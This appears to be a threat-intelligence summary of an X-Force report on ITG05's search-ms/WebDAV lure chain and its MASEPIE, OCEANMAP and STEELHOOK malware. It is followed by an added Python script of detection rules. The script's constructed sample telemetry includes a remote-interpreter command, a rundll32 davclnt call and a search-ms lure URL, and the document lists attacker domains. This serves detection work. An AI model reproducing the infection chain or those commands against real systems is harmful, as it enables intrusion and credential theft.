Keypoints
- ITG05 staged payloads on public hosting (notably firstcloudit[.]com) and weaponized lure pages that present a blurred document and a “VIEW DOCUMENT” button to initiate the chain.
- The campaign abuses the Windows “search‑ms” protocol to prompt File Explorer to open remote Saved Search (*.search-ms) entries that reference malicious .LNK shortcuts on WebDAV servers.
- .LNK targets execute remote Python (or earlier PowerShell) payloads from actor‑controlled WebDAV open directories, running Client.py and related binaries to start the infection.
- MASEPIE is a Python backdoor that connects via raw TCP every ~50 seconds, sends “whoami” plus a 16‑byte key, uses AES‑128‑CBC encryption, and supports commands: check, send_file, get_file, or arbitrary command execution via os.popen().
- OCEANMAP is a .NET backdoor derived from CREDOMAP that persists via EdgeContext.url, uses IMAP for C2 (checks Drafts for name_id/newtime), executes shell commands, and supports in‑place binary patching for config changes.
- STEELHOOK is a lightweight PowerShell stealer (webhook‑based) that replaced credential‑stealing in CREDOMAP, and the campaign aims to capture NTLMv2 hashes for relay/offline cracking.
MITRE Techniques
- [T1105] Ingress Tool Transfer – WebDAV hosting used to stage and serve payloads (Python interpreter, Client.py, MASEPIE). Quote: ‘actor-controlled WebDAV server’ and ‘open directory of a WebDAV server used in multiple campaigns’.
- [T1204] User Execution – Victim must click “VIEW DOCUMENT”, which triggers JavaScript that opens a search‑ms URL and prompts File Explorer, initiating the infection. Quote: ‘A button prompts the user to view the document by clicking.’
- [T1218] Signed Binary Proxy Execution – Use of legitimate Windows components to invoke remote resources; observed process usage: rundll32.exe calling davclnt.dll to interact with WebDAV. Quote: ‘Process: rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie <malicious_URL>’.
- [T1059] Command and Scripting Interpreter – PowerShell and Python are used to execute payloads and run commands; .LNK files run Python or embedded PowerShell to start Client.py. Quote: ‘the malicious Python script (Client.py) is executed by the remote Python interpreter (python.exe)’.
- [T1573] Encrypted Channel – MASEPIE uses AES‑128‑CBC to encrypt C2 communications over raw TCP. Quote: ‘starts AES-128-CBC encrypted communication’.
- [T1071] Application Layer Protocol – OCEANMAP uses IMAP mailboxes for C2 check-in and command delivery (checks Drafts for name_id). Quote: ‘OCEANMAP checks the inbox once every minute’ and ‘searches for emails in the “Drafts” mailbox containing its “name_id” string in the subject’.
- [T1003] Credential Dumping / Use of Credential Material – Campaign objectives include exfiltrating NTLMv2 hashes for offline cracking or relay attacks, leveraging forced authentication techniques. Quote: ‘exfiltration of NTLMv2 hashes for offline cracking or NTLM relay attacks’.
Indicators of Compromise
- [Domain] staging/hosting – firstcloudit[.]com (used to stage payloads and short‑lived subdomains), webhook[.]site (used for webhooks/interaction tracking).
- [Files / Filenames] malicious artifacts – EdgeContext.url (persistence for OCEANMAP), Client.py (remote Python payload), and malicious .LNK shortcuts referenced by *.search-ms files.
- [Network strings / Traffic] MASEPIE TCP marker – raw TCP traffic containing the string ‘<SEPARATOR>’ as an indicator of MASEPIE communications; IMAP payload indicator ‘newtime1:0000…000’ used by OCEANMAP.
- [Open directories / Hosting] WebDAV server content – actor-controlled WebDAV open directories serving python.exe and payloads (observed accessible directories and file listings).
- [Webhook/OOB domains] callback/tracking services – examples observed: *.webhook[.]site, *.oast[.]fun (and other oast.* domains listed) used to track lure visits and clicks.
The technical infection chain begins with weaponized lure pages that show a blurred document and a “VIEW DOCUMENT” button; embedded JavaScript triggers a “search‑ms” URL that queries an actor‑controlled WebDAV server. When the user accepts the File Explorer prompt, the remote Saved Search (*.search‑ms) returns an .LNK file pointing to a relative path on the WebDAV server; opening that .LNK executes a remote interpreter (historically PowerShell, later a Python executable) which runs Client.py and launches the payload while also opening the decoy PDF in Edge.
Payload staging relies on public hosting (notably firstcloudit[.]com) and WebDAV open directories. MASEPIE (Python) acts as the first‑stage backdoor: it connects over raw TCP every ~50 seconds, sends the “whoami” result together with a 16‑byte key, and uses AES‑128‑CBC for encrypted C2; it supports ‘check’, ‘send_file’, ‘get_file’, and arbitrary command execution via os.popen(). OCEANMAP (a .NET successor to CREDOMAP) persists via EdgeContext.url, uses IMAP as its C2 channel (searching the Drafts mailbox for its name_id and newtime markers), executes received commands, and can patch its own binary to change its configuration. STEELHOOK is a compact PowerShell stealer that delivers browser data via webhooks and replaces the earlier credential‑stealing functionality.
Operational details useful for detection: monitor for short‑lived firstcloudit subdomains and WebDAV activity, .search‑ms files invoking remote .LNKs, .LNK files that spawn remote Python executables or PowerShell, suspicious raw TCP flows containing ‘<SEPARATOR>’, IMAP traffic to unknown servers (and the long ‘newtime1:000…000’ pattern), and webhook/OOB domains (webhook[.]site, oast.*). Infrastructure analysis also noted TLS CNs suggesting hosting on compromised Ubiquiti devices and heavy use of webhooks (Interact.sh/webhook[.]site) to track interactions.
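The following is an added example, not code from the X-Force report or from ITG05's tooling: a small set of detection rules that turns the indicators listed under “Indicators of Compromise” and the monitoring guidance in the paragraph above into checks that can be run over process, URL, TCP and IMAP telemetry. The sample events are constructed, not captured from an incident; the `crumb=location` search‑ms parameter and the `\\host@SSL\DavWWWRoot` WebDAV UNC form are standard Windows conventions used here as assumptions about what such telemetry looks like, and the minimum run of zeros in the `newtime1` rule is an assumed threshold to tune on real data.

```python
"""Toy detection rules for the ITG05 infection chain summarised above.

Added example, not from the X-Force report. Each rule maps to the MITRE
technique the summary assigns to that behaviour. Thresholds and the shape
of the sample telemetry are assumptions, not values taken from the report.
"""
import re
from typing import Callable, Dict, List, Tuple

# (rule id, MITRE technique id, matched evidence)
Finding = Tuple[str, str, str]

# Hosts the summary names as staging or out-of-band callback infrastructure.
STAGING_DOMAINS = ("firstcloudit.com",)
OOB_DOMAINS = ("webhook.site", "oast.fun")  # extend with the other oast.* TLDs in use

# rundll32 loading davclnt.dll with the DavSetCookie export (WebDAV client hand-off).
DAVCLNT_RE = re.compile(r"rundll32(\.exe)?\s+.*davclnt\.dll,\s*DavSetCookie", re.I)
# A script interpreter started from, or pointed at, a remote UNC/WebDAV or HTTP path.
INTERP_RE = re.compile(r"\b(python|powershell|pwsh)(\.exe)?\b", re.I)
REMOTE_PATH_RE = re.compile(r"(\\\\[^\s\\]+\\|https?://)", re.I)
# OCEANMAP IMAP marker: 'newtime1:' followed by a long run of zeros (8+ is an assumed minimum).
NEWTIME_RE = re.compile(r"newtime1:0{8,}")
# MASEPIE raw-TCP field delimiter named on the page.
MASEPIE_SEPARATOR = b"<SEPARATOR>"


def _host_of(url: str) -> str:
    """Return the lower-cased host of a scheme://host/... URL, or '' if none."""
    m = re.match(r"[a-z][a-z0-9+.-]*://([^/:?#]+)", url, re.I)
    return m.group(1).lower() if m else ""


def _in_domains(host: str, domains: Tuple[str, ...]) -> bool:
    """Exact or subdomain match, so 'notfirstcloudit.com' does not match."""
    return any(host == d or host.endswith("." + d) for d in domains)


def detect_url(url: str) -> List[Finding]:
    """search-ms protocol launches and known staging / OOB callback hosts."""
    found: List[Finding] = []
    if url.lower().startswith("search-ms:"):
        found.append(("URL-SEARCHMS", "T1204", url))
    host = _host_of(url)
    if host and (_in_domains(host, STAGING_DOMAINS) or _in_domains(host, OOB_DOMAINS)):
        found.append(("URL-STAGING-OOB", "T1105", host))
    return found


def detect_process(cmdline: str) -> List[Finding]:
    """davclnt.dll proxy execution and interpreters run against remote paths."""
    found: List[Finding] = []
    if DAVCLNT_RE.search(cmdline):
        found.append(("PROC-DAVCLNT", "T1218", cmdline))
    if INTERP_RE.search(cmdline) and (
        REMOTE_PATH_RE.search(cmdline) or "client.py" in cmdline.lower()
    ):
        found.append(("PROC-REMOTE-INTERP", "T1059", cmdline))
    return found


def detect_tcp_payload(payload: bytes) -> List[Finding]:
    """MASEPIE check-in traffic carries the literal '<SEPARATOR>' delimiter."""
    if MASEPIE_SEPARATOR in payload:
        return [("NET-MASEPIE-SEP", "T1573", MASEPIE_SEPARATOR.decode())]
    return []


def detect_imap_subject(subject: str) -> List[Finding]:
    """OCEANMAP tasking in Drafts subjects: name_id plus the newtime1 zero run."""
    m = NEWTIME_RE.search(subject)
    return [("IMAP-OCEANMAP-NEWTIME", "T1071", m.group(0))] if m else []


DISPATCH: Dict[str, Callable] = {
    "url": detect_url,
    "process": detect_process,
    "tcp": detect_tcp_payload,
    "imap": detect_imap_subject,
}


def scan_events(events) -> List[Finding]:
    """events: iterable of (kind, value) pairs; returns all findings in order."""
    out: List[Finding] = []
    for kind, value in events:
        out.extend(DISPATCH[kind](value))
    return out


# Constructed sample telemetry (not from a real incident; 203.0.113.10 is a documentation address).
SAMPLE_EVENTS = [
    ("url", "search-ms:query=report&crumb=location:\\\\203.0.113.10@SSL\\DavWWWRoot\\docs"),
    ("url", "https://abc123.firstcloudit.com/lure.html"),
    ("url", "https://example.com/index.html"),
    ("process", r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 203.0.113.10@SSL https://203.0.113.10/docs/"),
    ("process", r"\\203.0.113.10@SSL\DavWWWRoot\python\python.exe \\203.0.113.10@SSL\DavWWWRoot\Client.py"),
    ("process", r"C:\Windows\System32\notepad.exe C:\Users\a\notes.txt"),
    ("tcp", b"WORKSTATION\\user<SEPARATOR>" + bytes(16)),
    ("imap", "name_id_abc newtime1:000000000000000000"),
]

if __name__ == "__main__":
    for rule, technique, evidence in scan_events(SAMPLE_EVENTS):
        print(f"{rule:24} {technique:6} {evidence}")
```

Each rule is deliberately narrow so that a hit is worth an analyst's time: the davclnt.dll rule keys on the specific export named in the report rather than on any rundll32 invocation, the interpreter rule fires only when python/PowerShell is combined with a remote path or the Client.py filename, and the domain check refuses lookalike hosts that merely end in the same string. In production these would be wired to the relevant log sources (process creation, web proxy, network sensor with payload visibility, and mail-server logs) rather than to an in-memory list.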
Read more: https://securityintelligence.com/x-force/itg05-leverages-malware-arsenal/